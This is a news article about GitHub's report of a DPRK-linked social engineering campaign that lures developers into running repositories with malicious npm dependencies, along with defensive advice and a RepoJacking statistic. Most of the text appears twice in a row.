GitHub has identified a small social engineering campaign targeting the personal accounts of tech firm employees. No GitHub or npm systems were compromised during this campaign, the platform says.
Attackers use a combination of repository prompts and malicious npm package dependencies. Many of these targeted accounts are related to the blockchain, cryptocurrency or online gambling sectors. Several of them belonged to employees of the cybersecurity sectors.
GitHub believes that the campaign was organized by the Jade Sleet or TraderTraitor group, associated with the DPRK. Attackers impersonate developers or recruiters by creating one or more fake accounts on GitHub and other social networks, including LinkedIn, Slack and Telegram. In some cases, hackers use stolen accounts. They may initiate contact on one platform and then try to move the conversation to another.
After making contact, the hacker invites the developer to collaborate on a GitHub repository and convinces him to clone and execute its contents. The repository can be public or private and contains software with malicious npm dependencies. The software may include media players and cryptocurrency trading tools.
Malicious npm packages download and run second-layer software on the victim's computer. GitHub provides a list of domains used for uploading.
An attacker often publishes their malicious packages only when they send a fraudulent invitation to the repository, minimizing the possibility of their verification. In some cases, hackers can deliver malware directly to a messaging or file sharing platform, bypassing the repository invitation step.
The mechanism of the first stage of malware is described in detail in the Phylum Security blog.
GitHub blocked accounts associated with the campaign and published a list of them. The platform sent reports of abuse to domain owners.
Users are advised to review the security log for action:repo.add_member events to determine whether they accepted a repository invitation from one of the hackers. They should also review dependencies and installation scripts. Newly published new packages, scripts, or dependencies that establish network connections during installation must undergo additional testing. Those who may have been targeted by the campaign are encouraged to contact their employer's cybersecurity department. If malicious content was launched, then you need to reset potentially vulnerable devices, change account passwords and tokens stored on the potentially affected device.
Meanwhile, Nautilus security team analyzed a sample of 1.25 million GitHub repositories and found that about 2.95% of them were vulnerable to RepoJacking attacks. They allow attackers to launch supply chain attacks that affect large numbers of users.
Attackers use a combination of repository prompts and malicious npm package dependencies. Many of these targeted accounts are related to the blockchain, cryptocurrency or online gambling sectors. Several of them belonged to employees of the cybersecurity sectors.
GitHub believes that the campaign was organized by the Jade Sleet or TraderTraitor group, associated with the DPRK. Attackers impersonate developers or recruiters by creating one or more fake accounts on GitHub and other social networks, including LinkedIn, Slack and Telegram. In some cases, hackers use stolen accounts. They may initiate contact on one platform and then try to move the conversation to another.
After making contact, the hacker invites the developer to collaborate on a GitHub repository and convinces him to clone and execute its contents. The repository can be public or private and contains software with malicious npm dependencies. The software may include media players and cryptocurrency trading tools.
Malicious npm packages download and run second-layer software on the victim's computer. GitHub provides a list of domains used for uploading.
An attacker often publishes their malicious packages only when they send a fraudulent invitation to the repository, minimizing the possibility of their verification. In some cases, hackers can deliver malware directly to a messaging or file sharing platform, bypassing the repository invitation step.
The mechanism of the first stage of malware is described in detail in the Phylum Security blog.
GitHub blocked accounts associated with the campaign and published a list of them. The platform sent reports of abuse to domain owners.
Users are advised to review the security log for action:repo.add_member events to determine whether they accepted a repository invitation from one of the hackers. They should also review dependencies and installation scripts. Newly published new packages, scripts, or dependencies that establish network connections during installation must undergo additional testing. Those who may have been targeted by the campaign are encouraged to contact their employer's cybersecurity department. If malicious content was launched, then you need to reset potentially vulnerable devices, change account passwords and tokens stored on the potentially affected device.
Meanwhile, Nautilus security team analyzed a sample of 1.25 million GitHub repositories and found that about 2.95% of them were vulnerable to RepoJacking attacks. They allow attackers to launch supply chain attacks that affect large numbers of users.
